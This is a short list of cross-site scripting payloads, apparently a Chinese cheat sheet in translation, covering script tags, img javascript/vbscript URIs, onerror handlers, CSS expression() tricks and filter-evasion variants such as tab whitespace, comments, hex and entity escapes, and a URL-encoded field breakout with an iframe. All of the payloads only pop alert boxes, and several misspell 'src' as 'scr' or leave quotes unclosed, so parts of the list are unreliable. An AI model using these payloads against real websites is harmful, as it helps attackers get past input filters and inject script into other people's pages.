<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["